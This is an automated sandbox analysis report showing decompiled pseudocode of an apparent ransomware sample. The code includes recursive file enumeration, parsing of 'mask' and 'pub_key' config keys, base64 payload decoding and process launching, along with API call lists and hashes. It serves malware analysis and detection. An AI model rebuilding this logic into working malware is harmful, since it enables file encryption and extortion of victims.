Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: eeda5d6bd9d79926414c386f34d5c7033964a93615a929b98a3f80aa2744ca35
Instruction ID: c8935523a8c5339a496f17e390a00817741d2a3272e9915592734d78def63d71
Opcode Fuzzy Hash: eeda5d6bd9d79926414c386f34d5c7033964a93615a929b98a3f80aa2744ca35
Instruction Fuzzy Hash: E20180B5244300BFE7509F90CC8EF6B7BA8AB44B20F044714FB659A1D1D7B09505CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00A86769 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00A86769() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E00A863B0(_t46, _t51 - 0x264, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if( *((intOrPtr*)(_t51 - 0xc)) <  *_t38) {
										goto L8;
									}
								}
							}
						} else {
							E00A866F0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x00a86770
0x00a86784
0x00a867a8
0x00a867b1
0x00a867e2
0x00a867ed
0x00a867ef
0x00a867f2
0x00a867f5
0x00a867f7
0x00a86800
0x00a86800
0x00a86803
0x00a86803
0x00a867f9
0x00a867fc
0x00a867fe
0x00000000
0x00000000
0x00a867fe
0x00a867f7
0x00a867b3
0x00a867c7
0x00a867cc
0x00a86810
0x00a86810
0x00a86823
0x00a8682e
0x00a8683c

APIs

lstrcmpW.KERNEL32(?,00A90368,?,?), ref: 00A8677C
lstrcmpW.KERNEL32(?,00A9036C,?,?), ref: 00A86796
lstrcatW.KERNEL32(00000000,?), ref: 00A867A8
lstrcatW.KERNEL32(00000000,00A9039C), ref: 00A867B9

Part of subcall function 00A866F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00A86723
Part of subcall function 00A866F0: lstrcatW.KERNEL32(00000000,00A90364), ref: 00A8673B
Part of subcall function 00A866F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00A86745

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 00A8681D
FindClose.KERNEL32(00003000,?,?), ref: 00A8682E

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 55446c7d99703e93a333ef9e6f3351445d1260553167bc57bfab5f93936559a1
Instruction ID: dd90dc359a945125e9fd297a483a7c00387130d5b2d5c1e74f9cb3ad063bb2e3
Opcode Fuzzy Hash: 55446c7d99703e93a333ef9e6f3351445d1260553167bc57bfab5f93936559a1
Instruction Fuzzy Hash: 41010C31A04219AFDF21ABA0EC49BFE7BB8FF48744F0445A6F909D6160DB319A51CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A83200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A83200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x00a83205
0x00a83208
0x00a8320a
0x00a8320e
0x00a8321f
0x00a8321f
0x00a83223
0x00000000
0x00a83225
0x00a83226
0x00a8322a
0x00a83230
0x00a83235
0x00a83239
0x00000000
0x00000000
0x00a8323b
0x00000000
0x00a83239
0x00a83245
0x00a83245
0x00a83248
0x00a83248
0x00a8324e
0x00a83270
0x00a83273
0x00a83284
0x00a8328a
0x00000000
0x00a8328a
0x00a83250
0x00a83251
0x00a83262
0x00a83268
0x00a8328d
0x00a8328f
0x00a83293
0x00a83293
0x00a8328f
0x00a83299
0x00a832a5
0x00a832a5
0x00a83210
0x00a83210
0x00a83214
0x00a83217
0x00000000
0x00a83219
0x00a83219
0x00a8321d
0x00000000
0x00000000
0x00000000
0x00000000
0x00a8321d
0x00000000
0x00a83217
0x00a8323e
0x00a83242
0x00a83242
0x00000000

APIs

lstrlenA.KERNEL32(00A85135,00000000,?,00A85136,?,00A834BF,00A85136,00000001,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A83251
GetProcessHeap.KERNEL32(00000008,00000001,?,00A834BF,00A85136,00000001,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A8325B
HeapAlloc.KERNEL32(00000000,?,00A834BF,00A85136,00000001,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A83262
lstrlenA.KERNEL32(00A85135,00000000,?,00A85136,?,00A834BF,00A85136,00000001,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A83273
GetProcessHeap.KERNEL32(00000008,00000001,?,00A834BF,00A85136,00000001,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A8327D
HeapAlloc.KERNEL32(00000000,?,00A834BF,00A85136,00000001,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A83284
lstrcpyA.KERNEL32(00000000,00A85135,?,00A834BF,00A85136,00000001,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A83293

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: beb62becde3b0eff1300f7254e06afd00792c29e0e985d4933f67c40bb8c4e70
Instruction ID: 532c4bf01f90f7544d3fb5e80fe16164e724a72f5fd7b2d97a74dd8d3d090c1b
Opcode Fuzzy Hash: beb62becde3b0eff1300f7254e06afd00792c29e0e985d4933f67c40bb8c4e70
Instruction Fuzzy Hash: 0511E6324082956EEF616FA89C4CBF7BB68FF22B10F284245E9C5C7250E77589438761

Uniqueness

Uniqueness Score: -1.00%

Function 00A833E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00A833E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E00A832B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E00A83320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E00A83190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E00A83200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x850f00e4
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x00a833e3
0x00a833e5
0x00a833e9
0x00a833eb
0x00a833ee
0x00a833f1
0x00a833f8
0x00a834db
0x00a834db
0x00a83410
0x00a83425
0x00a8342b
0x00a8342f
0x00000000
0x00a83431
0x00a83432
0x00a83434
0x00a8343a
0x00a83441
0x00a83444
0x00a8344a
0x00a8344b
0x00a834ba
0x00a8344d
0x00a8344e
0x00a83450
0x00a83452
0x00a83456
0x00a83467
0x00a83467
0x00a8346b
0x00a8346d
0x00a83471
0x00a83473
0x00a83478
0x00a8347c
0x00000000
0x00000000
0x00a8347e
0x00000000
0x00a8347c
0x00a83480
0x00a83480
0x00a83483
0x00a83484
0x00a83495
0x00a8349e
0x00a834a3
0x00a834a7
0x00a834a7
0x00a834ad
0x00a834b0
0x00a834b0
0x00000000
0x00a83458
0x00a8345c
0x00a8345f
0x00000000
0x00a83461
0x00a83461
0x00a83465
0x00000000
0x00000000
0x00000000
0x00000000
0x00a83465
0x00000000
0x00a8345f
0x00a83458
0x00a83456
0x00a8344e
0x00a8344b
0x00a83444
0x00a834bf
0x00a834bf
0x00a834bf
0x00a834c2
0x00a834c3
0x00a834d6
0x00a834d6
0x00a83412
0x00a83412
0x00a83418
0x00a83422
0x00a83422

APIs

Part of subcall function 00A832B0: lstrlenA.KERNEL32(?,00000000,?,00A85135,?,?,00A833F6,?,746566A0,?,?,00A85135,00000000), ref: 00A832C5
Part of subcall function 00A832B0: lstrlenA.KERNEL32(?,?,00A833F6,?,746566A0,?,?,00A85135,00000000), ref: 00A832EE

lstrlenA.KERNEL32(00A85136,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A83484
GetProcessHeap.KERNEL32(00000008,00000001,?,00A85135,00000000), ref: 00A8348E
HeapAlloc.KERNEL32(00000000,?,00A85135,00000000), ref: 00A83495
lstrcpyA.KERNEL32(00000000,00A85136,?,00A85135,00000000), ref: 00A834A7
ExitProcess.KERNEL32 ref: 00A834DB

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: d3ec0f631e07cb151efa6951272984984c905ddf2730298e8ac2159429667025
Instruction ID: 362154dc1b01bdd3cd149d4d03ff91ef7124f96e0a25fa17c2d18a284a2d675d
Opcode Fuzzy Hash: d3ec0f631e07cb151efa6951272984984c905ddf2730298e8ac2159429667025
Instruction Fuzzy Hash: C4315A735082455AEF237FA8C8487B67BA8DB02F12F284189E9D58B281D7794E47C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A83AE0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A83B32
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00A83B56
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00A83B5A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00A83B5E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00A83B85

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: f4f90474d8f505754923cfd41ce80fac6b72174982c3dba34efea9ac9534c3bd
Instruction ID: e3f2bbadbc36df6426a77e9d9e082af2f511972d89f7b364d1920af818ead891
Opcode Fuzzy Hash: f4f90474d8f505754923cfd41ce80fac6b72174982c3dba34efea9ac9534c3bd
Instruction Fuzzy Hash: CF111EB0D4031C6EEB60DB64DC0ABEB7ABCEF08700F008199A508E61C1D6B94B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 00A84BA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00A84BA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xa8ff2c]");
				_t16 =  *0xa8ff34; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x00a84ba6
0x00a84bae
0x00a84bb4
0x00a84bb9
0x00a84bbc
0x00a84bc1
0x00a84bc6
0x00a84bc9
0x00a84c1a
0x00a84c1c
0x00000000
0x00a84c1e
0x00a84c22
0x00a84c5f
0x00a84c61
0x00000000
0x00a84c63
0x00a84c6d
0x00a84c70
0x00a84c70
0x00a84c74
0x00000000
0x00000000
0x00a84c7a
0x00a84c7a
0x00a84c7d
0x00a84c80
0x00a84c80
0x00a84c84
0x00000000
0x00000000
0x00a84c8e
0x00a84c8e
0x00000000
0x00a84c8a
0x00a84c8c
0x00000000
0x00000000
0x00a84c95
0x00a84ca4
0x00000000
0x00a84ca4
0x00a84c80
0x00a84c24
0x00a84c24
0x00a84c28
0x00a84c2f
0x00a84c31
0x00a84c31
0x00a84c36
0x00a84c4f
0x00a84c52
0x00000000
0x00000000
0x00000000
0x00000000
0x00a84c38
0x00a84c38
0x00a84c38
0x00a84c3c
0x00000000
0x00000000
0x00a84c45
0x00a84c47
0x00000000
0x00a84c49
0x00a84c49
0x00a84c4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00a84c4d
0x00000000
0x00a84c47
0x00000000
0x00a84c38
0x00000000
0x00a84c54
0x00a84c54
0x00a84c57
0x00a84c58
0x00a84c59
0x00a84c5d
0x00000000
0x00a84c28
0x00a84c22
0x00a84bcb
0x00a84bcb
0x00a84bcf
0x00a84c05
0x00a84c19
0x00a84bd1
0x00a84bd3
0x00a84bd5
0x00a84bd5
0x00a84bd9
0x00a84bf7
0x00a84bfa
0x00000000
0x00000000
0x00000000
0x00000000
0x00a84bdb
0x00a84be0
0x00a84be0
0x00a84be4
0x00000000
0x00000000
0x00a84bed
0x00a84bef
0x00000000
0x00a84bf1
0x00a84bf1
0x00a84bf5
0x00000000
0x00000000
0x00000000
0x00000000
0x00a84bf5
0x00000000
0x00a84bef
0x00000000
0x00a84be0
0x00000000
0x00a84bfc
0x00a84bfc
0x00a84bff
0x00a84c00
0x00a84c01
0x00000000
0x00a84bd5
0x00a84bcf
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,00A84E7E), ref: 00A84C0D
lstrlenA.KERNEL32(00000000,?,00A84E7E), ref: 00A84C67
lstrcpyA.KERNEL32(?,?,?,00A84E7E), ref: 00A84C98

Strings

fabian wosar <3, xrefs: 00A84C05

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: 31f8af2d8118c88610e47ab8c236fe90bad25113f88e840a08af01446a315234
Instruction ID: 17adb30b495029b2cc2b38336344a302c68c8dbe7f968de344aeac3b66f45cef
Opcode Fuzzy Hash: 31f8af2d8118c88610e47ab8c236fe90bad25113f88e840a08af01446a315234
Instruction Fuzzy Hash: 9331F6B580A2A75BCB26BF7858143FABFB9AF4F301F181299C8D597206D7214C46D390

Uniqueness

Uniqueness Score: -1.00%

Function 00A83190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A83190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x00a83193
0x00a83197
0x00a8319c
0x00a831b0
0x00a831b9
0x00a831ce
0x00a831d1
0x00a831d9
0x00a831e1
0x00a831e4
0x00a831e9
0x00a831a0
0x00a831a0
0x00a831a0
0x00a831a4
0x00000000
0x00000000
0x00a831a8
0x00a831ec
0x00000000
0x00a831aa
0x00a831aa
0x00a831ae
0x00000000
0x00000000
0x00000000
0x00000000
0x00a831ae
0x00000000
0x00a831a8
0x00a831f5
0x00a831f5
0x00000000

APIs

lstrcmpiA.KERNEL32(00A85135,mask,00A85136,?,?,00A83441,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A831B9
lstrcmpiA.KERNEL32(00A85135,pub_key,?,00A83441,00A85136,00000000,?,746566A0,?,?,00A85135,00000000), ref: 00A831D1

Strings

mask, xrefs: 00A831B1
pub_key, xrefs: 00A831BF

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: 3119908ce6211762708ed611ea6ed5e5a9c95a21c0135409abcc4b67ca383d86
Instruction ID: f6c9776a144aabb276073195e52a940f3f6745adf5519a43d83d0040d587b6c3
Opcode Fuzzy Hash: 3119908ce6211762708ed611ea6ed5e5a9c95a21c0135409abcc4b67ca383d86
Instruction Fuzzy Hash: E0F08B733082845EFF19ABACDC49BA2BBCC9B41F10F580A7EE6C9C2190D2A58C81C350

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: qvvfpl.exePID: 3252, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	705
Total number of Limit Nodes:	10

Executed Functions

Function 00D748A0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 165
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D748A0(void* __ecx) {
				void* _v8;
				CHAR* _v12;
				int _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				int _v44;
				int _v48;
				void* _v52;
				char _v72;
				void* _t50;
				int _t75;
				void* _t77;
				short* _t98;
				void* _t102;

				_t82 = __ecx;
				Sleep(0x3e8); // executed
				_t50 = E00D74550(_t82); // executed
				if(_t50 != 0) {
					ExitProcess(0); // executed
				}
				_v8 = CreateThread(0, 0, E00D72D30, 0, 0, 0);
				if(_v8 != 0) {
					if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
						_t82 = _v8;
						TerminateThread(_v8, 0);
					}
					CloseHandle(_v8);
				}
				E00D74640();
				E00D740A0(_t82);
				E00D75EF0( &_v72);
				_v36 = 0;
				_v32 = 0;
				_v24 = 0;
				_v40 = 0;
				_t97 =  &_v40;
				E00D75EA0( &_v72,  &_v24,  &_v40,  &_v36,  &_v32);
				_v44 = 0;
				_v12 = 0;
				if(E00D74880(_v24) != 0) {
					ExitProcess(0);
				}
				L8:
				while(_v44 == 0) {
					_t97 = _v40;
					_t77 = E00D75750(_v24, _v40, _v36, _v32,  &_v12);
					_t102 = _t102 + 0xc;
					if(_t77 != 0) {
						_v44 = 1;
					} else {
						Sleep(0x2710);
					}
				}
				E00D75E60( &_v72);
				_v28 = 0;
				_v16 = 0;
				_v48 = 0;
				_v52 = 0;
				__eflags = _v12;
				if(_v12 != 0) {
					_v16 = lstrlenA(_v12);
					_v28 = VirtualAlloc(0, _v16, 0x3000, 4);
					_t97 = _v12;
					_t75 = CryptStringToBinaryA(_v12, 0, 1, _v28,  &_v16, 0, 0);
					__eflags = _t75;
					if(_t75 == 0) {
						ExitProcess(0);
					}
					_v48 = 1;
				}
				E00D73FF0();
				InitializeCriticalSection(0xd82ae8);
				__eflags = _v48;
				if(__eflags == 0) {
					E00D73DE0( &_v72);
				} else {
					_t97 = _v16;
					E00D73FC0(_v28, _v16, __eflags);
				}
				DeleteCriticalSection(0xd82ae8);
				__eflags = E00D73A60();
				if(__eflags != 0) {
					E00D74330(__eflags);
				}
				_v20 = VirtualAlloc(0, 0x200, 0x3000, 4);
				__eflags = _v20;
				if(__eflags != 0) {
					GetModuleFileNameW(0, _v20, 0x100);
					E00D73BA0(_v20, _t97, __eflags);
					VirtualFree(_v20, 0, 0x8000);
				}
				__eflags =  *0xd82ae4;
				if( *0xd82ae4 != 0) {
					_t98 =  *0xd82ae4; // 0x0
					ShellExecuteW(0, L"open", _t98, 0, 0, 5);
				}
				return E00D75FC0( &_v72);
				goto L8;
			}

0x00d748a0
0x00d748ab
0x00d748b1
0x00d748b8
0x00d748bc
0x00d748bc
0x00d748d7
0x00d748de
0x00d748f4
0x00d748f8
0x00d748fc
0x00d748fc
0x00d74906
0x00d74906
0x00d7490c
0x00d74911
0x00d74919
0x00d7491e
0x00d74925
0x00d7492c
0x00d74933
0x00d74942
0x00d7494d
0x00d74952
0x00d74959
0x00d7496a
0x00d7496e
0x00d7496e
0x00000000
0x00d74974
0x00d74986
0x00d7498c
0x00d74991
0x00d74996
